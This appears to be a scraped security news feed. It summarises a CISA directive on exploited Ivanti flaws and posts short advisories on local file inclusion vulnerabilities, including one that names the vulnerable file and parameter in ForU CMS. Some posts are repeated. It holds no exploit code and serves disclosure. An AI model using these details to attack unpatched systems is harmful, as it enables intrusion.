The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products.
The development arrives as the vulnerabilities – an authentication bypass (CVE-2023-46805) and a code injection bug (CVE-2024-21887) – have come under widespread exploitation by multiple threat actors. The flaws allow a malicious actor to craft malicious requests and execute arbitrary commands on the system.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤3👍1
🔴 CVE
CVE-2023-48382
Softnext Mail SQR Expert
یک پلتفرم مدیریت ایمیل است که دارای یک آسیبپذیری Local File Inclusion (LFI) در URL مربوط به تحویل ایمیل است. یک مهاجم ازراه دور تأیید نشده میتواند از این آسیبپذیری برای اجرای فایل PHP دلخواه با پسوند فایل .asp در مسیرهای خاص سیستم، برای دسترسی و اصلاح اطلاعات جزئی سیستم سوء استفاده کند، اما در دسترس بودن سرویس تأثیری ندارد.
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2023-48382
Softnext Mail SQR Expert
یک پلتفرم مدیریت ایمیل است که دارای یک آسیبپذیری Local File Inclusion (LFI) در URL مربوط به تحویل ایمیل است. یک مهاجم ازراه دور تأیید نشده میتواند از این آسیبپذیری برای اجرای فایل PHP دلخواه با پسوند فایل .asp در مسیرهای خاص سیستم، برای دسترسی و اصلاح اطلاعات جزئی سیستم سوء استفاده کند، اما در دسترس بودن سرویس تأثیری ندارد.
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
⚡2
🔴 CVE
CVE-2024-0728
LFI
A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2024-0728
LFI
A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍2